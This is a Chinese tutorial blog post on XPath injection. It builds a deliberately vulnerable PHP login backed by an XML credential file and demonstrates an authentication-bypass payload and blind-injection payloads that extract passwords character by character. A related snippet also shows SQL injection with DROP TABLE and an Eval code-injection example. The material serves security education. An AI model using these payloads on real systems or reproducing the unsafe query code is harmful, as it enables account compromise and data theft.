xpath注入与盲注

xpath注入与盲注

XPath是一种查询语言,描述如何在XML文档中查找特定元素(包括属性、处理指令等),于SQL相似,Xpath可以引用XML文档的几乎任何部分,而不受访问控制限制。

XPath盲注可以从一个使用不安全方式嵌入用户信息的应用中提取数据,在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种攻击适用情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,与SQL盲注相似。

测试

//xpath_user.xml

<?xml version="1.0" encoding="UTF-8"?>
<users>
<user id="1" username="admin" password="admin"></user>
<user id="2" username="root" password="admin"></user>
<user id="3" username="system" password="system"></user>
</users>
//xpath.php

<!DOCTYPE html>
<html>
        <head>
                <meta charset="UTF-8">
                <title></title>
        </head>
        <body>
                        <form method="POST">
                                用户名:<input type="text" name="username"><br>
                                密码:<input type="password" name="password"><br>
                                <input type="submit" value="登录" name="submit">
                        </form>
        </body>
</html>
<?php
if(file_exists('xpath_user.xml')){
        $xml=simplexml_load_file('xpath_user.xml');

        if($_POST['submit']){
                $username=$_POST['username'];
                $password=$_POST['password'];
                $sql="//user[@username='{$username}' and @password='{$password}']";
                $resulit = $xml->xpath($sql);
                if(count($resulit)==0){
                        echo '登录失败';
                }else{
                        echo "登录成功";
                }
        }
        }
?>

php件的用户登录使用的信息来自xml文件

$sql="//user[@username='{$username}' and @password='{$password}']";

select * from users where username='username' and password='password';
两个语句效果是相似的,实现的功能就是提取用户名和密码

方法

注入方法

万能密码: admin’ or ‘1’='1

x-www-from-urlencoded(raw): username=admin’ or ‘1’=‘1’ &password=xxxxxx&submit=submit

登陆成功

盲注方法

string-length()获取字符长度

substring 截取字符

注入语句(post data)

username=admin’and string-length(@password)=6 or ‘1’='1&password=0&submit=submit

获取长度,返回成功则表示长度正确

username=admin’and substring (@password,1,1)=‘a’ or ‘1’='1&password=0&submit=submit

尝试第一个字母是否为a,返回成功则表示字母正确,以此类推可以遍历出所有信息

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL 注入示例: 假设我们有一个用户登录的功能,对应的查询语句为: ``` string sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; ``` 攻击者可以通过输入特殊字符,例如 ' 或者 ;,来构造恶意的查询语句,例如: ``` string username = "admin'; DROP TABLE users;--"; string password = "123456"; ``` 这样就会导致查询语句变成: ``` SELECT * FROM users WHERE username='admin'; DROP TABLE users;--' AND password='123456' ``` 这条语句会执行两个操作:首先查询用户名为 admin 的用户,然后删除 users 表。这就是 SQL 注入攻击的典型案例。 XPath 注入示例: 假设我们有一个使用 XPath 查询 XML 数据的功能,对应的查询语句为: ``` string xpath = "/users/user[@name='" + username + "' and @password='" + password + "']"; ``` 攻击者可以通过输入特殊字符,例如 ' 或者 ;,来构造恶意的查询语句,例如: ``` string username = "admin' or 1=1 or ''='"; string password = "123456"; ``` 这样就会导致查询语句变成: ``` /users/user[@name='admin' or 1=1 or ''=' and @password='123456'] ``` 这条语句会查询用户名为 admin 或者 1=1 或者 ''='',因为 1=1 和 ''='' 都是恒成立的。这就是 XPath 注入攻击的典型案例。 代码注入示例: 假设我们有一个执行用户输入的代码的功能,对应的代码为: ``` string code = Request.Params["code"]; object result = Eval(code); ``` 攻击者可以通过输入特殊字符,例如 ; 或者 &,来构造恶意的代码,例如: ``` string code = "System.Diagnostics.Process.Start(\"cmd.exe\",\"/c calc.exe\")"; ``` 这样就会导致执行了一个恶意的命令,打开计算器程序。这就是代码注入攻击的典型案例。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RICKC131

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值